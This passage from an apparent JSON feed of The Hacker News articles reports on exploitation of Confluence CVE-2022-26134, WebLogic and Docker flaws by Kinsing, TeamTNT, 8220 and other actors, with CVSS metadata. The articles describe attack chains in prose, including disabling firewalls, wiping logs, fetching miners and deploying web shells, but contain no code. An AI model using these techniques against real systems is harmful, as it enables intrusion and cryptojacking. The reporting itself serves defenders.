hundreds of thousands of open- and closed-source projects worldwide, creating a substantial software supply chain attack surface,\" Douglas McKee [noted](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/limiting-the-software-supply-chain-attack-surface.html>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-22T09:17:00", "type": "thn", "title": "15-Year-Old Unpatched Python Vulnerability Potentially Affects Over 350,000 Projects", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4559", "CVE-2022-30333"], "modified": "2022-09-23T04:29:36", "id": "THN:2DA6F98EC7A48A092478A6E6EB267C1C", "href": "https://thehackernews.com/2022/09/15-year-old-unpatched-python.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-18T05:57:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj9rIpLd7Wt8S6XBYbfSyi_LxY3hVen8bxDxWgv56ywl84WByL1Zl26yIu_oQ18uh4gvIi8vulmy9q1SZTMxCmqhEiWx0sm82_GHXfs821huyPVdY3i9HR5j_Dk6uxz27udcCKd-Tl7Z1edq42KHthx8Ln0XuGeTqNQ5nDnXn7z5jvyBqljfIiqhIVu/s728-e100/ransomware.jpg>)\n\nA recently patched [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.\n\nIn at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a [crypto miner](<https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/>) called z0miner on victim networks.\n\nThe bug ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>), CVSS score: 9.8), which was [patched](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.\n\nOther notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called [pwnkit](<https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html>), and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.\n\n\"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage,\" Andrew Brandt, principal security researcher at Sophos, [said](<https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj4ylTTjRkYLtYQCSXoVz8gUgRgTa98lR7XaqcG9UbybTcDEi9J5hfotnq_Gutzoj81P5XHccmBjiW9E7KZlw5edBNyVl0N0zwIwuyQGM4A95z1ZdyCtPLIHlvFzE_XXxyZJjC55Sp3sPQrsczwhlKexPSQGqBrt0qHXhWsFMoMEcBZXvs-OTYPTLet/s728-e100/code.jpg>)\n\nThe disclosure overlaps with similar warnings from Microsoft, which [revealed](<https://twitter.com/MsftSecIntel/status/1535417776290111489>) last week that \"multiple adversaries and nation-state actors, including [DEV-0401](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0401>) and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134.\"\n\nDEV-0401, described by Microsoft as a \"China-based lone wolf turned LockBit 2.0 affiliate,\" has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon ([Log4Shell](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>)), Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>)), and on-premises Exchange servers ([ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>)).\n\nThe development is emblematic of an [ongoing trend](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-18T04:11:00", "type": "thn", "title": "Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-18T04:11:14", "id": "THN:0488E447E08622B0366A0332F848212D", "href": "https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T09:56:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgtFRIbOmYLbsTQsfQcmDa8dd7UbU-isTy7dToS2Gy1p7s--Zt-QgfjUpligZQwwZouhjIgGzL8kjD1QlluSfAvuZ7I7GKPJG21wA9tfWYRmChZ7jK57W-8AeMWNQDwHO9tEJkbBfs3AltDvfY7kp3Bl13jp3djDlSN_7F0g5plbOk_BGleGYX9aFNC/s728-e100/hackers.jpg>)\n\nAtlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.\n\nThe Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as **CVE-2022-26134**.\n\n\"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server,\" it [said](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) in an advisory.\n\n\"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix.\" Specifics of the security flaw have been withheld until a software patch is available.\n\nAll supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version is yet to be ascertained.\n\nIn the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling the instances altogether. Alternatively, it has recommended implementing a web application firewall (WAF) rule which blocks URLs containing \"${\" to reduce the risk.\n\nVolexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. as part of an incident response investigation.\n\nThe attack chain involved leveraging the Atlassian zero-day exploit \u2014 a command injection vulnerability \u2014 to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.\n\n\"[Behinder](<https://github.com/Freakboy/Behinder>) provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike,\" the researchers [said](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). \"At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out.\"\n\nSubsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including [China Chopper](<https://www.mandiant.com/resources/the-little-malware-that-could-detecting-and-defeating-the-china-chopper-web-shell>) and a custom file upload shell to exfiltrate arbitrary files to a remote server.\n\nThe development comes less than a year after another critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.\n\n\"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks,\" Volexity said. \"Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T03:43:00", "type": "thn", "title": "Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-03T09:27:09", "id": "THN:573D61ED9CCFF01AECC281F8913E42F8", "href": "https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-22T08:18:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgNDB_6urGQ6KJEXanQt_pnHjch23bL6gkveY_rOhDjbe4aoM3fY-HCttsNtRUZDqHuVy9mNU18TLb4dYkj4PS1k95YfJlM8CL-hT9QNezW6GwsBeDapBrHrXEriDxJIeTtZI57ZQvwAS_Tic8ecD0wm8qgF6Aq2T-VPvXYXxJNg8SREGCGZlwHdhzZ/s728-e100/malware.jpg>)\n\nA now-patched critical security flaw affecting Atlassian Confluence Server that came to light a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.\n\n\"If left unremedied and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as a complete domain takeover of the infrastructure and the deployment information stealers, remote access trojans (RATs), and ransomware,\" Trend Micro threat researcher Sunil Bharti [said](<https://www.trendmicro.com/en_us/research/22/i/atlassian-confluence-vulnerability-cve-2022-26134-abused-for-cryptocurrency-mining-other-malware.html>) in a report.\n\nThe issue, tracked as [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) (CVSS score: 9.8), was addressed by the Australian software company in June 2022.\n\nIn one of the infection chains observed by the cybersecurity company, the flaw was leveraged to download and run a shell script (\"ro.sh\") on the victim's machine, which, in turn, fetched a second shell script (\"ap.sh\").\n\nThe malicious code is designed to update the [PATH variable](<https://www.digitalocean.com/community/tutorials/how-to-view-and-update-the-linux-path-environment-variable>) to include additional paths such as \"/tmp\", download the cURL utility (if not already present) from a remote server, disable iptables firewall, abuse the [PwnKit flaw](<https://thehackernews.com/2022/09/new-stealthy-shikitega-malware.html>) (CVE-2021-4034) to gain root privileges, and ultimately deploy the hezb crypto miner.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgJUBIiTQNhHQT7F4futeVMM2_cBIIPj-5ZrZyhn0F2LxqA0mpy-CsPoin32NArWubqXSZLDYTS1ZIeDtR_X8GEGlXvkNeXx4aL2VaogujG-5IWSExG-3DZArq7MNuOLv1yLywHo1bUv6GdjWbgkDMoArlCUKyC2Er-EgIo1UmgacIcGat8-xAz6eag/s728-e100/curl.jpg>)\n\nLike other cryptojacking attacks, the shell script also terminates other competing coin miners, disables cloud service provider agents from Alibaba and Tencent, before carrying out lateral movement via SSH.\n\nThe findings mirror similar exploitation attempts previously disclosed by [Lacework](<https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/>), [Microsoft, Sophos](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>), and [Akamai](<https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations>) in June.\n\nLacework's analysis further shows that the command-and-control (C2) server used to retrieve the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named \"[kik](<https://www.virustotal.com/gui/file/f13e48658426307d9d1434b50fa0493f566ed1f31d6e88bb4ac2ae12ec31ef1f/>)\" that enables the malware to kill processes of interest.\n\nUsers are advised to prioritize patching the flaw as it could be abused by threat actors for other nefarious purposes.\n\n\"Attackers could take advantage of injecting their own code for interpretation and gain access to the Confluence domain being targeted, as well as conduct attacks ranging from controlling the server for subsequent malicious activities to damaging the infrastructure itself,\" Bharti said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-22T06:17:00", "type": "thn", "title": "Hackers Targeting Unpatched Atlassian Confluence Servers to Deploy Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4034", "CVE-2022-26134"], "modified": "2022-09-22T06:17:56", "id": "THN:E0B486DA1C8CE77D0DF337E8307100D6", "href": "https://thehackernews.com/2022/09/hackers-targeting-unpatched-atlassian.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T15:21:14", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjZikEHbQZH2740G4dp8jO0kyRIM7gekb01xPNfj0-CNWOHWfP49M11r5XMILsEcE7cPt2iS2r5JguGaSn_eB79jXM2K0R34NTk8BJ914Rl12I6nIAEFE-yl5_wTmv9bEkhsALDug2BF38CByGj0bXfCDfOdw9gmkOjWBtZi0TtheQni8IQOx3M9hnZ/s728-e100/hacking.jpg>)\n\nA threat actor is said to have \"highly likely\" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector.\n\nThe attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch as **TAC-040**.\n\n\"The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory,\" the company [said](<https://www.deepwatch.com/labs/deepwatch-ati-detects-and-responds-to-never-before-discovered-backdoor-deployed-using-confluence-vulnerability-for-suspected-espionage/>). \"After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment.\"\n\nThe Atlassian vulnerability suspected to have been exploited is [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>), an Object-Graph Navigation Language (OGNL) injection flaw that paves the way for arbitrary code execution on a Confluence Server or Data Center instance.\n\nFollowing reports of active exploitation in real-world attacks, the issue was addressed by the Australian company on June 4, 2022.\n\nBut given the absence of forensic artifacts, Deepwatch theorized the breach could have alternatively entailed the exploitation of the Spring4Shell vulnerability ([CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>)) to gain initial access to the Confluence web application.\n\nNot much is known about TAC-040 other than the fact that the adversarial collective's goals could be espionage-related, although the possibility that the group could have acted out of financial gain hasn't been ruled out, citing the presence of a loader for an XMRig crypto miner on the system.\n\nWhile there is no evidence that the miner was executed in this incident, the Monero address owned by the threat actors has netted at least 652 XMR ($106,000) by hijacking the computing resources of other systems to illicitly mine cryptocurrency.\n\nThe attack chain is also notable for the deployment of a previously undocumented implant called Ljl Backdoor on the compromised server. Roughly 700MB of archived data is estimated to have been exfiltrated before the server was taken offline by the victim, according to an analysis of the network logs.\n\nThe malware, for its part, is a fully-featured trojan virus designed to gather files and user accounts, load arbitrary .NET payloads, and amass system information as well as the victim's geographic location. \n\n\"The victim denied the threat actor the ability to laterally move within the environment by taking the server offline, potentially preventing the exfiltration of additional sensitive data and restricting the threat actor(s) ability to conduct further malicious activities,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T10:24:00", "type": "thn", "title": "Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-26134"], "modified": "2022-08-05T14:21:49", "id": "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "href": "https://thehackernews.com/2022/08/hackers-exploited-atlassian-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-16T15:26:53", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1sRBo_ZY7HgvKOAmX48Fm2WVmdgzaxlpLKjWJdIbcDmSPoMhKNRnvoEzs1CeLQfriVUkngqRhLj6-9awHtv_DcqbKgRbmXo_M_03xicrkKz34GxB6Z68bL51GfJszPQZSm7wdORW1UR-5UcTEgmW2YZ3RvbgUdobA9TKfRbeoXpG1vtvq1S-yeEcf/s728-e100/crypto-mining.jpg>)\n\nMalicious actors such as Kinsing are taking advantage of both recently disclosed and older security flaws in Oracle WebLogic Server to deliver cryptocurrency-mining malware.\n\nCybersecurity company Trend Micro said it [found](<https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html>) the financially-motivated group leveraging the vulnerability to drop Python scripts with capabilities to disable operating system (OS) security features such as Security-Enhanced Linux ([SELinux](<https://www.redhat.com/en/topics/linux/what-is-selinux>)), and others.\n\nThe operators behind the [Kinsing malware](<https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces>) have a history of scanning for vulnerable servers to co-opt them into a botnet, including that of [Redis](<https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html>), [SaltStack](<https://redcanary.com/blog/kinsing-malware-citrix-saltstack/>), [Log4Shell](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>), [Spring4Shell](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>), and the Atlassian Confluence flaw ([CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>)).\n\nThe Kinsing actors have also been involved in campaigns against container environments via [misconfigured open Docker Daemon API ports](<https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability>) to launch a crypto miner and subsequently spread the malware to other containers and hosts.\n\nThe latest wave of attacks entails the actor weaponizing [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (CVSS score: 9.8), a two-year-old remote code execution (RCE) bug, against unpatched servers to seize control of the server and drop malicious payloads.\n\nIt's worth noting that the vulnerability has been [exploited in the past](<https://thehackernews.com/2020/12/multiple-botnets-exploiting-critical.html>) by multiple botnets to distribute Monero miners and the Tsunami backdoor on infected Linux systems. \n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh-utvgKxe36MyxmW2adubFVWxVKr-1Z4nJnB9nCLoIz72PJGF2D8Ti92uYdI0q1Y-KNK6paKazaUlHWRQZziPwY5119ANOJMXqaoGe4zOQOvqeEL1KkDD0Ed6TPx0FMjstH-f-8Sk0X--OysqaQnanHwm4INx3STYgUBwVWAo4Jzx5tnTWbKUt7EO4/s728-e100/hack.jpg>)\n\nSuccessful exploitation of the flaw was succeeded by the deployment of a shell script that's responsible for a series of actions: Removing the [/var/log/syslog](<https://help.ubuntu.com/community/LinuxLogFiles>) system log, turning off security features and cloud service agents from Alibaba and Tencent, and killing competing miner processes.\n\nThe shell script then proceeds to download the Kinsing malware from a remote server, while also taking steps to ensure persistence by means of cron job.\n\n\"The successful exploitation of this vulnerability can lead to RCE, which can allow attackers to perform a plethora of malicious activities on affected systems,\" Trend Micro said. \"This can range from malware execution [...] to theft of critical data, and even complete control of a compromised machine.\"\n\n## **TeamTNT actors make a comeback with new attacks**\n\nThe development comes as researchers from Aqua Security identified three new attacks linked to another \"vibrant\" cryptojacking group called TeamTNT, which voluntarily shut shop in November 2021.\n\n\"TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script (k.sh) to a C2 server,\" Aqua Security researcher Assaf Morag [said](<https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt>).\n\nWhat's notable about the attack chain is that it appears to be designed to break [SECP256K1 encryption](<https://en.bitcoin.it/wiki/Secp256k1>), which, if successful, could give the actor the ability to calculate the keys to any cryptocurrency wallet. Put differently, the idea is to leverage the high but illegal computational power of its targets to run the ECDLP solver and get the key.\n\nTwo other attacks mounted by the group entail the exploitation of [exposed Redis servers](<https://blog.aquasec.com/container-attacks-on-redis-servers>) and misconfigured Docker APIs to deploy coin miners and Tsunami binaries.\n\nTeamTNT's targeting of Docker REST APIs has been [well-documented](<https://thehackernews.com/2021/12/ongoing-autom-cryptomining-malware.html>) over the past year. But in an [operational security blunder](<https://www.trendmicro.com/en_us/research/22/i/security-breaks-teamtnts-dockerhub-credentials-leak.html>) spotted by Trend Micro, credentials associated with two of the attacker-controlled DockerHub accounts have been uncovered.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi0IY0nHIYVyoplfjBcUxHe2UQ8HJC-CQsXJZNKOFuXC17C5Qr6a4wRSM0arKFfc-z29j61GI_am83TJutj7s1RlsF0UQx0uq8dvuNfezG7wqD3PYDPqFHBO8m7qopVHCWrgR4GYVjM8c_OlyO6Fl0eUcrIcwH9vV7RwxB2-SpZb-AiOpx65Z7kdB1W/s728-e100/cyber.jpg>)\n\nThe accounts \u2013 alpineos and sandeep078 \u2013 are said to have been used to distribute a variety of malicious payloads like rootkits, Kubernetes exploit kits, credential stealers, XMRig Monero miners, and even the Kinsing malware.\n\n\"The account alpineos was used in exploitation attempts on our honeypots three times, from mid-September to early October 2021, and we tracked the deployments' IP addresses to their location in Germany,\" Trend Micro's Nitesh Surana [said](<https://www.trendmicro.com/en_us/research/22/i/security-breaks-teamtnts-dockerhub-credentials-leak.html>).\n\n\"The threat actors were logged in to their accounts on the DockerHub registry and probably forgot to log out.\" Alternatively, \"the threat actors logged in to their DockerHub account using the credentials of alpineos.\"\n\nTrend Micro said the malicious alpineos image had been downloaded more than 150,000 times, adding it notified Docker about these accounts. \n\nIt's also recommending organizations to configure the exposed REST API with TLS to mitigate adversary-in-the-middle (AiTM) attacks, as well as use credential stores and [helpers](<https://github.com/docker/docker-credential-helpers>) to host user credentials.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-16T10:58:00", "type": "thn", "title": "Hackers Targeting WebLogic Servers and Docker APIs for Mining Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2022-26134"], "modified": "2022-09-16T15:00:46", "id": "THN:FF1CD6F91A87ADD45550F34DE9C8204A", "href": "https://thehackernews.com/2022/09/hackers-targeting-weblogic-servers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-01T09:57:46", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiYAJVYh7pU2b-Cxud9O1OpqsSwZ8YbSRc4HT6Cl84UE1B0y7nA6w78v6G2gfrH0CgQlYIfu0sypoAedPhkg5IjEPSr4btJnWbRlNUVivoYBtop-pya2puoyFdfhMSBEHez9B2xUru68Zv-DLxNWbxFad3b5mVOAcpQY8lBe_JBMpXEgmBFN0ec7z-R/s728-e100/linux.jpg>)\n\nA cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.\n\n\"The updates include the deployment of new versions of a crypto miner and an IRC bot,\" Microsoft Security Intelligence [said](<https://twitter.com/MsftSecIntel/status/1542281805549764608>) in a series of tweets on Thursday. \"The group has actively updated its techniques and payloads over the last year.\"\n\n8220, active since [early 2017](<https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html>), is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. It's also the developer of a tool called whatMiner, which has been co-opted by the [Rocke](<https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html>) cybercrime group in their attacks.\n\nIn July 2019, the Alibaba Cloud Security Team 